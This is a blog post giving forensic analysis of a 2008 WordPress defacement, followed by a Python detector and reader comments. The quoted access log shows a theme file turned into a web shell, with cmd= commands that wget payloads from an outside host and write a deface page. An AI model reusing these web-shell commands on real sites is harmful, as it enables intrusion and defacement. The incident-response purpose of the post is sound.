Apologies first of all for the delay in posting part 2 of "antihackerlink was hacked" on this blog; real life has kept me busy :). OK, straight to it: this time the forensic analysis is done on the raw access log of the antihackerlink server. Here we have deliberately provided only that access log. Let's analyze it together here :) .

88.237.213.52 - - [04/Dec/2008:04:52:28 +0700] "GET / HTTP/1.1"
88.237.213.52 - - [04/Dec/2008:04:53:21 +0700] "GET /?page_id=2 HTTP/1.1" 200 12535 "
88.237.213.52 - - [04/Dec/2008:04:54:23 +0700] "GET / HTTP/1.1" <- "http://www.google.com/search?client=opera&rls=tr&q=antihackerlink.or.id&sourceid=opera&ie=utf-8&oe=utf-8"
88.237.213.52 - - [04/Dec/2008:05:01:50 +0700] "GET /wp-login.php HTTP/1.1"
88.237.213.52 - - [04/Dec/2008:05:01:58 +0700] "POST /wp-login.php HTTP/1.1"
88.237.213.52 - - [04/Dec/2008:05:01:59 +0700] "GET /wp-admin/ HTTP/1.1" <- "http://antihackerlink.or.id/wp-login.php"
88.237.213.52 - - [04/Dec/2008:05:02:06 +0700] "GET /wp-admin/edit.php HTTP/1.1"
88.237.213.52 - - [04/Dec/2008:05:02:10 +0700] "GET /wp-admin/post.php?action=edit&post=34 HTTP/1.1"
88.237.213.52 - - [04/Dec/2008:05:02:51 +0700] "GET /wp-admin/media-upload.php?post_id=34&type=image& HTTP/1.1"
88.237.213.52 - - [04/Dec/2008:05:03:00 +0700] "POST /wp-admin/async-upload.php HTTP/1.1"
88.237.213.52 - - [04/Dec/2008:05:03:05 +0700] "POST /wp-admin/async-upload.php HTTP/1.1"
88.237.213.52 - - [04/Dec/2008:05:03:26 +0700] "POST /wp-admin/admin-ajax.php HTTP/1.1" <- "http://antihackerlink.or.id/wp-admin/post.php?action=edit&post=34"
88.237.213.52 - - [04/Dec/2008:05:03:26 +0700] "POST /wp-admin/admin-ajax.php HTTP/1.1" <- "http://antihackerlink.or.id/wp-admin/post.php?action=edit&post=34"
88.237.213.52 - - [04/Dec/2008:05:03:35 +0700] "GET /wp-content/uploads/2008/12/405.php HTTP/1.1"
88.237.213.52 - - [04/Dec/2008:05:03:39 +0700] "GET /wp-content/uploads/2008/12/405.php/ HTTP/1.1"
88.237.213.52 - - [04/Dec/2008:05:04:31 +0700] "GET /wp-admin/media-upload.php?post_id=34&type=image& HTTP/1.1"
88.237.213.52 - - [04/Dec/2008:05:04:44 +0700] "POST /wp-admin/media-upload.php?type=image&tab=type&post_id=34 HTTP/1.1"
88.237.213.52 - - [04/Dec/2008:05:05:18 +0700] "GET /wp-content/uploads/2008/12/403.php HTTP/1.1"
88.237.213.52 - - [04/Dec/2008:05:05:20 +0700] "GET /wp-content/uploads/2008/12/403.php/ HTTP/1.1"
….. ……
….. ……
….. ……
….. ……
88.237.213.52 - - [04/Dec/2008:05:05:50 +0700] "GET /wp-admin/theme-editor.php HTTP/1.1"
88.237.213.52 - - [04/Dec/2008:05:06:04 +0700] "GET /wp-admin/theme-editor.php?file=/themes/illacrimo/footer.php&theme=Illacrimo HTTP/1.1"
88.237.213.52 - - [04/Dec/2008:05:06:39 +0700] "POST /wp-admin/theme-editor.php HTTP/1.1"
88.237.213.52 - - [04/Dec/2008:05:06:50 +0700] "GET /wp-admin/theme-editor.php?file=/themes/illacrimo/footer.php&theme=Illacrimo&a=te HTTP/1.1"
88.237.213.52 - - [04/Dec/2008:05:07:18 +0700] "POST /wp-admin/theme-editor.php HTTP/1.1"
88.237.213.52 - - [04/Dec/2008:05:07:42 +0700] "GET /wp-admin/theme-editor.php?file=/themes/illacrimo/footer.php&theme=Illacrimo&a=te HTTP/1.1"
88.237.213.52 - - [04/Dec/2008:05:09:56 +0700] "POST /wp-admin/theme-editor.php HTTP/1.1"
88.237.213.52 - - [04/Dec/2008:05:10:08 +0700] "GET /wp-content/themes/illacrimo/footer.php HTTP/1.1"
88.237.213.52 - - [04/Dec/2008:05:11:52 +0700] "POST /wp-admin/theme-editor.php HTTP/1.1"
88.237.213.52 - - [04/Dec/2008:05:11:53 +0700] "GET /wp-admin/theme-editor.php?file=/themes/illacrimo/footer.php&theme=Illacrimo&a=te HTTP/1.1"
88.237.213.52 - - [04/Dec/2008:05:11:58 +0700] "GET //wp-content/themes/illacrimo/footer.php HTTP/1.1"
88.237.213.52 - - [04/Dec/2008:05:12:00 +0700] "GET //wp-content/themes/illacrimo/footer.php HTTP/1.1"
88.237.213.52 - - [04/Dec/2008:05:12:05 +0700] "GET //wp-content/themes/illacrimo/
88.237.213.52 - - [04/Dec/2008:05:12:08 +0700] "GET //wp-content/themes/illacrimo/v4.php
88.237.213.52 - - [04/Dec/2008:05:12:09 +0700] "GET //wp-content/themes/illacrimo/v4.php
88.237.213.52 - - [04/Dec/2008:05:12:15 +0700] "GET //wp-content/themes/illacrimo/v454.php
—————-
88.237.213.52 - - [04/Dec/2008:05:12:54 +0700] "GET //wp-content/themes/illacrimo/footer.php HTTP/1.1"
88.237.213.52 - - [04/Dec/2008:05:13:04 +0700] "GET //wp-content/themes/illacrimo/footer.php?cmd=ls HTTP/1.1"
88.237.213.52 - - [04/Dec/2008:05:13:08 +0700] "GET //wp-content/themes/illacrimo/footer.php?cmd=ls%20-lia HTTP/1.1"
88.237.213.52 - - [04/Dec/2008:05:13:45 +0700] "GET //wp-content/themes/illacrimo/footer.php?cmd=wget%20http://hackzone.kiev.ua/403.txt;mv%20403.txt%20z.php;ls%20-lia HTTP/1.1"
88.237.213.52 - - [04/Dec/2008:05:14:02 +0700] "GET //wp-content/themes/illacrimo/footer.php?cmd=wget%20http://hackzone.kiev.ua/403.txt;ls%20-lia HTTP/1.1"
88.237.213.52 - - [04/Dec/2008:05:14:28 +0700] "GET //wp-content/themes/illacrimo/footer.php?cmd=wget%20http://0d4y.org;ls%20-lia HTTP/1.1"
88.237.213.52 - - [04/Dec/2008:05:15:13 +0700] "GET //wp-content/themes/illacrimo/footer.php?cmd=pwd HTTP/1.1"
88.237.213.52 - - [04/Dec/2008:05:15:26 +0700] "GET //wp-content/themes/illacrimo/footer.php?cmd=ls%20-lia%20/home/sakitjiw/public_html/antihackerlink.or.id/ HTTP/1.1"
88.237.213.52 - - [04/Dec/2008:05:15:49 +0700] "GET /v4.php HTTP/1.1"
88.237.213.52 - - [04/Dec/2008:05:18:59 +0700] "GET //wp-content/themes/illacrimo/footer.php?cmd=cd%20/home/sakitjiw/public_html/antihackerlink.or.id/;echo%20'hacked%20ogi%20'%3Ev4.php HTTP/1.1"
88.237.213.52 - - [04/Dec/2008:05:19:05 +0700] "GET /v4.php
88.237.213.52 - - [04/Dec/2008:05:20:18 +0700] "GET //wp-content/themes/illacrimo/footer.php?cmd=cd%20/home/sakitjiw/public_html/antihackerlink.or.id/;echo%20x%20%3Ev4.php HTTP/1.1"
88.237.213.52 - - [04/Dec/2008:05:20:21 +0700] "GET /v4.php
88.237.213.52 - - [04/Dec/2008:05:24:27 +0700] "GET //wp-content/themes/illacrimo/footer.php?cmd=cd%20/home/sakitjiw/public_html/antihackerlink.or.id/;echo%20%3Ccenter%3E%3Ch2%3E%20%20Hacked%20%3Cbr%3E%20%20By_Ogmass%20&%20S4S_7%3Cbr%3E%20%20Got%20RooT%20?%3Cbr%3E%20%20uid=0(ogis4s)%20gid=0(ogis4s)%20groups=0(ogis4s)%3Cbr%3E%20%20Linux%20aquarius.romantis.net%202.6.9-023stab044.11-enterprise HTTP/1.1"
88.237.213.52 - - [04/Dec/2008:05:24:36 +0700] "GET /v4.php HTTP/1.1"
88.237.213.52 - - [04/Dec/2008:05:25:19 +0700] "GET //wp-content/themes/illacrimo/footer.php?cmd=cd%20/home/sakitjiw/public_html/antihackerlink.or.id/;echo'%3Ccenter%3E%3Ch2%3E%20%20Hacked%20%3Cbr%3E%20%20By_Ogmass%20&%20S4S_7%3Cbr%3E%20%20Got%20RooT%20?%3Cbr%3E%20%20uid=0(ogis4s)%20gid=0(ogis4s)%20groups=0(ogis4s)%3Cbr%3E%20%20Linux%20aquarius.romantis.net%202.6.9-023stab044.11-enterprise HTTP/1.1"
88.237.213.52 - - [04/Dec/2008:05:25:22 +0700] "GET /v4.php HTTP/1.1"
88.237.213.52 - - [04/Dec/2008:05:26:59 +0700] "GET //wp-content/themes/illacrimo/footer.php?cmd=cd%20/home/sakitjiw/public_html/antihackerlink.or.id/;echo'Hacked%20By_Ogmass%20&%20S4S_7'%3Ev4.php HTTP/1.1"
88.237.213.52 - - [04/Dec/2008:05:27:01 +0700] "GET /v4.php HTTP/1.1"
88.237.213.52 - - [04/Dec/2008:05:27:27 +0700] "GET //wp-content/themes/illacrimo/footer.php?cmd=cd%20/home/sakitjiw/public_html/antihackerlink.or.id/;echo%20'%20Hacked%20By_Ogmass%20&%20S4S_7%20'%20%3Ev4.php HTTP/1.1"
88.237.213.52 - - [04/Dec/2008:05:27:41 +0700] "GET / HTTP/1.1"
88.237.213.52 - - [04/Dec/2008:05:28:17 +0700] "GET //wp-content/themes/illacrimo/footer.php?cmd=cd%20/home/sakitjiw/public_html/antihackerlink.or.id/; HTTP/1.1"
88.237.213.52 - - [04/Dec/2008:05:28:45 +0700] "GET //wp-content/themes/illacrimo/footer.php?cmd=http://hackzone.kiev.ua/403.txt? HTTP/1.1"
88.237.213.52 - - [04/Dec/2008:05:28:49 +0700] "GET //wp-content/themes/illacrimo/footer.php?cmd=http://hackzone.kiev.ua/403.txt? HTTP/1.1"
88.237.213.52 - - [04/Dec/2008:05:28:51 +0700] "GET //wp-content/themes/illacrimo/footer.php?cmd=http://hackzone.kiev.ua/403.txt? HTTP/1.1"
88.237.213.52 - - [04/Dec/2008:05:28:59 +0700] "GET //wp-content/themes/illacrimo/footer.php?cmd=http://hackzone.kiev.ua HTTP/
88.237.213.52 - - [04/Dec/2008:05:29:03 +0700] "GET //wp-content/themes/illacrimo/footer.php?cmd= HTTP/1.1"
88.237.213.52 - - [04/Dec/2008:05:29:08 +0700] "GET //wp-content/themes/illacrimo/footer.php?cmd=pwd HTTP/1.1"
88.237.213.52 - - [04/Dec/2008:05:29:53 +0700] "GET //wp-content/themes/illacrimo/footer.php?cmd=cd%20/home/sakitjiw/public_html/antihackerlink.or.id/wp-content/themes/;ls%20-lia HTTP/1.1"

88.237.213.52 - - [04/Dec/2008:05:30:48 +0700] "GET /wp-admin/post-new.php HTTP/1.1"
………………………
88.237.213.52 - - [04/Dec/2008:06:46:38 +0700] "GET / HTTP/1.1"2286 "http://www.zone-h.org/component/option,com_attacks/Itemid,45/filter_defacer,By_Ogmass/"
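
As an added example (my own code, not part of the original post or of the antihackerlink site), here is a small Python pass that reads access-log lines in the format shown above and pulls out the three moments a defender should catch in this incident: a PHP file being requested from the media uploads directory, a POST to the theme editor (a theme file being rewritten from inside wp-admin), and a theme file being called with a `cmd=` query parameter. The sample lines are constructed to mirror the log above; the client address 203.0.113.5, the `/home/example/` path and all function names are my own placeholders.

```python
import re
from collections import Counter
from urllib.parse import unquote_plus

# Common/combined log prefix: client, identd, user, [timestamp], "METHOD target HTTP/x.y".
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+)(?: HTTP/[\d.]+)?"'
)

# Constructed sample, modelled on the format of the log above (placeholder IP and path).
SAMPLE_LOG = """\
203.0.113.5 - - [04/Dec/2008:04:52:28 +0700] "GET / HTTP/1.1" 200 2286
203.0.113.5 - - [04/Dec/2008:05:01:58 +0700] "POST /wp-login.php HTTP/1.1" 302 0
203.0.113.5 - - [04/Dec/2008:05:03:00 +0700] "POST /wp-admin/async-upload.php HTTP/1.1" 200 120
203.0.113.5 - - [04/Dec/2008:05:03:35 +0700] "GET /wp-content/uploads/2008/12/405.php/ HTTP/1.1" 200 55
203.0.113.5 - - [04/Dec/2008:05:06:39 +0700] "POST /wp-admin/theme-editor.php HTTP/1.1" 302 0
203.0.113.5 - - [04/Dec/2008:05:13:04 +0700] "GET //wp-content/themes/illacrimo/footer.php?cmd=ls HTTP/1.1" 200 812
203.0.113.5 - - [04/Dec/2008:05:15:26 +0700] "GET //wp-content/themes/illacrimo/footer.php?cmd=ls%20-lia%20/home/example/ HTTP/1.1" 200 2048
203.0.113.5 - - [04/Dec/2008:05:20:00 +0700] "GET /wp-content/uploads/2008/12/photo.jpg HTTP/1.1" 200 9000
"""


def parse_line(line):
    """Parse one log line into ip, ts, method, path and a query dict; None if it does not match."""
    m = LOG_RE.match(line)
    if not m:
        return None
    target = m.group("target")
    raw_path, _, raw_query = target.partition("?")
    # Collapse the doubled leading slash (//wp-content/...) so path checks are not fooled by it.
    path = re.sub(r"/{2,}", "/", raw_path)
    # Decode the query by hand so a ';' inside a value (as in chained shell commands)
    # is kept as part of the value rather than treated as a separator.
    query = {}
    for part in raw_query.split("&"):
        if not part:
            continue
        key, _, value = part.partition("=")
        query.setdefault(unquote_plus(key), unquote_plus(value))
    return {"ip": m.group("ip"), "ts": m.group("ts"), "method": m.group("method"),
            "path": path, "query": query}


def flags_for(entry):
    """Return the detection flags that apply to a parsed entry."""
    flags = []
    path = entry["path"].rstrip("/")          # "405.php/" is still a request for 405.php
    if path.startswith("/wp-content/uploads/") and path.endswith(".php"):
        flags.append("php_in_uploads")        # executable code served from the media directory
    if entry["method"] == "POST" and path == "/wp-admin/theme-editor.php":
        flags.append("theme_file_written")    # theme editor used to save a modified PHP file
    if "cmd" in entry["query"]:
        flags.append("cmd_param")             # a theme file accepting a command parameter
    return flags


def analyze(log_text):
    """Walk the log, count each flag and build a timeline of flagged requests."""
    counts = Counter()
    timeline = []
    for line in log_text.splitlines():
        entry = parse_line(line)
        if entry is None:
            continue
        for flag in flags_for(entry):
            counts[flag] += 1
            detail = entry["path"]
            if flag == "cmd_param":
                detail = "cmd=" + entry["query"]["cmd"]
            timeline.append((entry["ts"], entry["ip"], flag, detail))
    return {"counts": dict(counts), "timeline": timeline}


if __name__ == "__main__":
    report = analyze(SAMPLE_LOG)
    for ts, ip, flag, detail in report["timeline"]:
        print(f"{ts}  {ip}  {flag:<18} {detail}")
    print(report["counts"])
```

Run against the real log this would flag the 405.php/403.php requests, each theme-editor save, and every `footer.php?cmd=` call, which together give the full timeline from upload to web shell. The point for a defender is that all three are ordinary WordPress admin actions on their own; it is the sequence, from one client, in one session, that makes the picture unmistakable, so the detection should alert on the combination rather than on any single line.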

17 Responses to “Part II – antihackerlink was hacked”

  1. shidex says:

    aw aw aw aw..
    just make your own wp theme, heh heh heh

    brb, running awaaay.. gotta fix mine too, who knows it could end up like that

  2. andyan says:

    after reading it several times I still don't get what it means

  3. kuc1n9_bl4ck says:

    WEkzz,, what's the meaning, bro fl3xu5... huehehehe..:D

    88.237.213.52 - - [04/Dec/2008:05:27:27 +0700] "GET //wp-content/themes/illacrimo/footer.php?cmd=cd%20/home/sakitjiw/public_html/antihackerlink.or.id/;echo%20'%20Hacked%20By_Ogmass%20&%20S4S_7%20'%20%3Ev4.php HTTP/1.1"

  4. EA Ngel says:

    After reading it over and over, it's clear that from the very start they made antihackerlink the target they were going to deface; you can see above that they looked into and tried to get into every file / folder using a hacking technique different from what other people usually do. So in my opinion, they (the Turkish defacers) didn't just focus on public exploits; they used an alternative method that is rarely used anymore :) Cool of them. Thanks for Part II Antihackerlink, Bang fl3xu5

  5. blank_alpha says:

    indeed..
    the suspect looks confused..
    going into directories one by one..
    respect to the suspect, haha..

    running awaaay....

  6. ijoo says:

    hohoohoh...
    sakitjiwa is arif, right...
    ixoxioxioxioo.. what was he doing?

  7. emberbocor says:

    wooh...
    cool....

    =========
    running away...

    @sakitjiwa : :)

  8. The curious Psycho says:

    Bro.....

    was antihackerlink's WP not updated??

    Oh yeah, did they take the exploit from http://hackzone.kiev.ua/403.txt;mv%20403.txt%20z.php;ls%20-lia ??

  9. petunia says:

    Damn, wp got swallowed too...
    permission to copy-paste, mas, so I can study it

  10. l41n says:

    just as i had predicted xD~

  11. Rindho says:

    hihihi why did he go straight to footer.php....
    in my opinion.....
    read it at http://rindho.com/?sub=view&id=9&kategori=forensic%20antihackerlink.or.id%20part%20II

    :D

  12. gech4 says:

    sorry bang, I don't understand
    heh heh
    wp, wp, mine isn't updated either, hehehe

  13. sakitjiwa says:

    @rindho
    yessssssssssssssssssss tq

  14. fl3xu5 says:

    thanks to sakitjiwa n JinX :)

    addition: http://www.milw0rm.com/exploits/6421

    Regards,
    fl3xu5

  15. ArieL, FX says:

    woala..

    how did the vuln end up in google?

  16. security experts really have to be sharp, huh.. to that extent..
    If I were told to read a log like that, whoa.. no way. I'm too lazy even to read program logs.. :p

  17. radiaku says:

    Wew, so he got into wp, then edited the footer to create his own bug, i.e. wrote his own RFI code. Then he opened the folders one by one, bang

    This is just a simple comment, since I haven't looked into it further.

    I'm gonna scram now.

    —————————————>> scram
